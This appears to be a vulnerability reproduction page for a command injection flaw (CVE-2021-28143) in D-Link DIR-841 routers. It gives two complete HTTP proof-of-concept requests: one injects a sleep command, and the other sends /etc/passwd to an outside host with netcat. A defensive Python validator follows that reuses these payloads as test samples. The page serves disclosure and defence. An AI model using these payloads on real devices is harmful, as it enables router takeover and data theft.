# D-Link DIR-841 Command Injection Vulnerability CVE-2021-28143

## Vulnerability Description

D-Link DIR-841 3.03 and 3.04 contain an authenticated command injection. Commands can be injected through the "System Tools" functions (ping/ping6/traceroute), allowing an attacker to take full control of the device.

Reference links:

- https://nvd.nist.gov/vuln/detail/CVE-2021-28143
- https://github.com/vitorespf/Advisories/blob/master/DLINK-DIR-841-command-injection.txt

## Vulnerability Reproduction

poc:

```
POST /jsonrpc HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Authorization: Digest username="admin", realm="domain", nonce="4784226", uri="/jsonrpc", response="84799b55020cf2c53e28214e3d60b899", qop=auth, nc=00000035, cnonce="bPzBB3mcvSb51Ijx"
Content-Length: 156
Origin: IP
Connection: close
Referer: http://ip-address:9821/admin/index.html
Cookie: user_ip=0.0.0.0; device_mode=router; user_login=admin; device-session-id=

{"jsonrpc":"2.0","method":"write","params":{"id":166,"data":{"host":"'127.0.0.1 & sleep 5'","count":1,"is_ipv6":false,"max_ttl":30,"nqueries":2,"waittime":3},"save":true},"id":757}
```

Exfiltrating files:

```
POST /jsonrpc HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Authorization: Digest username="admin", realm="domain", nonce="4784226", uri="/jsonrpc", response="84799b55020cf2c53e28214e3d60b899", qop=auth, nc=00000035, cnonce="bPzBB3mcvSb51Ijx"
Content-Length: 156
Origin: IP
Connection: close
Referer: http://ip-address:9821/admin/index.html
Cookie: user_ip=0.0.0.0; device_mode=router; user_login=admin; device-session-id=

{"jsonrpc":"2.0","method":"write","params":{"id":166,"data":{"host":"'127.0.0.1 & nc SERVER-IP 1234 < /etc/passwd'","count":1,"is_ipv6":false,"max_ttl":30,"nqueries":2,"waittime":3},"save":true},"id":757}
```
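
A defensive check for the `host` field abused in the requests above, added here as an example (it is not D-Link firmware code and not from the advisory): an allowlist validator that accepts only an IP literal or an RFC 1123 hostname, plus an inspector for `/jsonrpc` bodies that could run in a reverse proxy or over captured traffic. The function names, the `body` helper and the third sample are assumptions made for illustration.

```python
import ipaddress
import json
import re

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with '-', total length at most 253.
HOSTNAME_RE = re.compile(
    r"(?=.{1,253}\Z)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\Z"
)

def is_safe_host(value):
    """Allowlist check: accept only an IP literal or an RFC 1123 hostname."""
    if not isinstance(value, str):
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return HOSTNAME_RE.match(value) is not None

def inspect_jsonrpc(body):
    """Return a finding string for a disallowed params.data.host, else None."""
    try:
        host = json.loads(body)["params"]["data"]["host"]
    except (ValueError, KeyError, TypeError):
        return None  # not a request of the shape shown in the PoC
    if is_safe_host(host):
        return None
    return "rejected host value: %r" % (host,)

def body(host):
    """Hypothetical helper: build a JSON-RPC body shaped like the page's PoC."""
    return json.dumps({"jsonrpc": "2.0", "method": "write", "id": 757,
                       "params": {"id": 166, "save": True,
                                  "data": {"host": host, "count": 1}}})

# First two host values are taken from the page's PoC; the third is constructed.
SAMPLES = [
    body("'127.0.0.1 & sleep 5'"),
    body("'127.0.0.1 & nc SERVER-IP 1234 < /etc/passwd'"),
    body("router.example.com"),
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(inspect_jsonrpc(sample) or "ok")
```

An allowlist is used instead of a metacharacter blocklist so that quotes, `&`, spaces, redirections and values starting with `-` are all rejected without enumerating them.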